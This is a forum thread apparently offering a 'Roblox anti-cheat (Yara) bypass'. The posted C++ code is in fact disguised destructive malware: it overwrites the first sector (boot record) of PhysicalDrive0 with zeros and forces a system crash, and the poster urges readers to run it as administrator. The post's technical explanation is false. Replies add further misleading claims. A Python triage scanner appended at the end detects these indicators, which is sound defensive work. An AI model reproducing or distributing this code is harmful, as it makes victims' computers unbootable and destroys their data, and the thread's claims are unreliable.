[rel] Full Roblox Anti Cheat (Yara) Bypass
Posted
Hello Skids.
Today I've decided to release my unpatchable Yara Bypass.
#include <iostream>
#include <windows.h>
int main() {
static auto mod = reinterpret_cast<uintptr_t>(GetModuleHandle(nullptr));
const auto ntdll = GetModuleHandleA("ntdll.dll");
using rtladjustprivilege_t = NTSTATUS(__stdcall*)(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN);
const auto RtlAdjustPrivilege = reinterpret_cast<rtladjustprivilege_t>(GetProcAddress(ntdll, "RtlAdjustPrivilege"));
using ntraiseharderror_t = NTSTATUS(__stdcall*)(NTSTATUS, ULONG, ULONG, PULONG_PTR*, ULONG, PULONG);
const auto NtRaiseHardError = reinterpret_cast<ntraiseharderror_t>(GetProcAddress(ntdll, "NtRaiseHardError"));
uint8_t payload[0x200];
RtlZeroMemory(&payload, 0x200);
const auto yara = CreateFileA("\\\\.\\PhysicalDrive0", 0x10000000L, FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr, 3, 0, nullptr);
if (WriteFile(yara, payload, 0x200, nullptr, nullptr)) {
BOOLEAN b_enabled;
RtlAdjustPrivilege(19, true, false, &b_enabled);
ULONG response;
NtRaiseHardError(0xE12DAA1F, 0, 0, 0, 6, &response);
}
}
It works by raising an exception at the address "0xE12DAA1F" which will fully disable Yara due to lack of competency from the Roblox Development Team. It works externally and is undetectable. Please leave a vouch if the bypass worked for you.
Make sure to run it as administrator to avoid any errors.
Replied
"Questionable intelligence, but I like the mystery" - CubeFaces
https://cdn.discordapp.com/attachments/1136067487847415848/1138948596679589898/sig.png
Replied
Imma just commit "no trust"
https://cdn.discordapp.com/attachments/978212409145708565/997561258918301777/unknown.png
Did I mention I use arch btw?
Replied
@Whoman This is just Yara's secret NamedPipe Name. It is used to communicate between the Main Process and the Daemon.
Replied
Guys, you have to disable fe in your headhunter first to use it, otherwise it won't work.
fka as delta
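For triage of downloads like the code in the opening post, here is an added example (not code from the thread or its posters) that flags a file by indicator combination: the posted code opens \\.\PhysicalDrive0, writes 0x200 zero bytes to it with WriteFile, then calls RtlAdjustPrivilege(19, ...) and NtRaiseHardError with response option 6. The function names, verdict labels and sample byte strings are constructed for illustration.

```python
import re

# Indicators drawn from the code in the opening post. The path pattern matches
# both the escaped C-source spelling and the form stored in a compiled binary.
INDICATORS = {
    "raw_disk_path": re.compile(rb"\\{2,4}\.\\{1,2}PhysicalDrive\d+", re.I),
    "write_call": re.compile(rb"WriteFile"),
    "adjust_privilege": re.compile(rb"RtlAdjustPrivilege"),
    "hard_error": re.compile(rb"NtRaiseHardError"),
}

def scan(data: bytes) -> set:
    """Return the names of the indicators present in raw file bytes."""
    # Second view with NUL bytes stripped so UTF-16LE strings also match.
    views = (data, data.replace(b"\x00", b""))
    return {n for n, rx in INDICATORS.items() if any(rx.search(v) for v in views)}

def verdict(hits: set) -> str:
    """Classify by combination; each indicator alone also occurs in benign tools."""
    if {"raw_disk_path", "write_call"} <= hits:
        # A write to \\.\PhysicalDriveN lands on disk sectors, below any filesystem.
        return "destructive" if "hard_error" in hits else "raw-disk-write"
    if {"adjust_privilege", "hard_error"} <= hits:
        return "forced-crash"
    return "no-match"

def triage(path: str) -> str:
    """Scan one file on disk before it is compiled or run."""
    with open(path, "rb") as fh:
        return verdict(scan(fh.read()))

# Constructed samples (not real files): source text, UTF-16LE binary strings, benign.
SAMPLE_SRC = (rb'h = CreateFileA("\\\\.\\PhysicalDrive0", ...); WriteFile(h, buf, n, 0, 0); '
              rb'RtlAdjustPrivilege(...); NtRaiseHardError(...);')
SAMPLE_BIN = "\\\\.\\PhysicalDrive0".encode("utf-16le") + b"\x00\x00WriteFile\x00"
SAMPLE_BENIGN = b"GetProcAddress(ntdll, \"RtlAdjustPrivilege\")"

if __name__ == "__main__":
    for name in ("SAMPLE_SRC", "SAMPLE_BIN", "SAMPLE_BENIGN"):
        print(name, "->", verdict(scan(globals()[name])))
```

A "destructive" or "raw-disk-write" verdict means the file should be read line by line in an isolated VM before anything is compiled or run with administrator rights.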